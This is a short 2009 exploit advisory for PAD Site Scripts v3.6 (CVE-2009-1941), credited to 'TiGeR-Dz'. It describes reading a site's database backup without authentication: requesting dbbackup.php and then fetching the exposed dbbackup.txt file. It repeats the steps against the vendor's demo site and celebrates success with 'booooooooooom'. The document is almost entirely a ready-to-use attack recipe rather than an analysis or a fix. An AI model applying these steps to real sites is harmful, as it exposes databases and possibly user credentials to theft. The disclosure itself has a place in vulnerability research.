Topic:	PAD Site Scripts v3.6 Bypass DB Backup Vulnerability
Credit:	TiGeR-Dz
Date:	2009.06.08
CWE:	CWE-264 (Show similar)
CVE:	CVE-2009-1941 (Show details) Use CVE to see details like: - CVSS2, - Affected Software, - References

---------------------------------------------------------------
---------------------------------------------------------------
PAD Site Scripts v3.6 Bypass DB Backup Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http://www.pad-site-scripts.com
Script:PAD Site Scripts v3.6
Download:http://www.pad-site-scripts.com/demo.php
Thank you my best Friends The g0bL!N and Hisok4
---------------------------------------------------------------
Exploit
-------
www.site.com/[path]/dbbackup.php
Note: We can not download Backup Because This site is required name admin and password for download Backup
and We will read Backup Without Download
Go to www.site.com/dbbackup.txt

And booooooooooom The backup is reading :)
----------------------------------------------------------------
Dem0
----
http://demo.pad-site-scripts.com/sysop/dbbackup.php
Go to
http://demo.pad-site-scripts.com/dbbackup.txt

And booooooooooom The backup is reading :)
--------------------------------------
Greeting To ALL My Friends (Dz)
----------------------------------------------------------------

References: